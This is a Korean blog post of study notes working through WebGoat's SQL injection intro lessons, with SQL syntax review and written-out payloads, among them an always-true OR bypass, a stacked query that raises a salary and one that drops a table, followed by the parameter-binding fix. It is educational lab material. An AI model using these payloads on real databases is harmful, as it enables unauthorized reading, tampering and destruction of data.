강의 및 교육/Inflearn - Webgoat

SQL Injection (intro)

이우정 2022. 3. 6. 21:44

SQL Injection 

- 사용자 입력이 SQL 쿼리 문자열에 그대로 이어 붙여질 때, 입력값으로 쿼리 구조를 바꿔 DBMS를 공격


DML

SELECT [열] FROM [테이블] WHERE [조건]
-- Look up the department of the single employee whose userid is 96134.
SELECT department
FROM employees
WHERE userid = 96134

UPDATE [테이블] SET [열] = '변경할값' WHERE [조건]
-- Move the employee with userid 89762 into the Sales department.
UPDATE employees
SET department = 'Sales'
WHERE userid = 89762

DDL

-- Add a nullable Birth column (up to 6 characters) to UserTbl.
ALTER TABLE UserTbl
    ADD Birth VARCHAR(6) NULL
-- Add a phone column (up to 20 characters) to employees.
ALTER TABLE employees
    ADD phone VARCHAR(20)

DCL

GRANT [객체권한명] (컬럼)
ON [객체명]
TO { 유저명 | 롤명 | PUBLIC } [WITH GRANT OPTION]
-- Give unauthorized_user read (SELECT) access to the grant_rights object.
GRANT SELECT
ON grant_rights
TO unauthorized_user

SELECT * FROM user_data WHERE first_name = 'John' AND last_name = '____________________'

                                                                    Smith' or '1' = '1

모든 데이터 검색 — '1' = '1' 은 항상 참이고 AND 가 OR 보다 먼저 묶이므로, (first_name 조건 AND last_name 조건) OR 참 = WHERE 전체가 참

1번 필드는 숫자만 가능
" 필터링

 

성공
성공


"SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
                                                Smith                     1' or 1=1 --
                                                             /       False      True        /
                                                                          True
                                                                          
                                                                          
                                                
"SELECT * FROM employees WHERE last_name = ' Smith ' AND auth_tan = '1' or 1=1 -- '";

"SELECT * FROM employees WHERE last_name = '" + name + "' AND auth_tan = '" + auth_tan + "'";
                                                Smith
// 뒷부분 (auth_tan 에 들어가는 입력)

auth_tan = '" + ____________________________________________________________________ +"'";
                3SL99A'; update employees set SALARY = 100000 where userid = '37648

auth_tan = '3SL99A'; update employees set SALARY = 100000 where userid = '37648';

1'; drop table access_log --
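기존 검색 막고 (1' 로 auth_tan 문자열을 닫음)
    drop 구문 넣고 (; 로 앞 문장을 끝낸 뒤 새 문장 추가)
                          뒤에 주석처리 (-- 로 뒤에 남는 ' 를 무효화)

=> 원인은 입력값을 쿼리 문자열에 + 로 이어 붙이는 것. PreparedStatement 같은 파라미터 바인딩(?)으로 값을 넘기면 위 입력들은 쿼리 구조를 바꾸지 못하고 단순 값으로만 비교된다. 애플리케이션 DB 계정에는 DROP / UPDATE 등 필요 없는 권한을 주지 않는다.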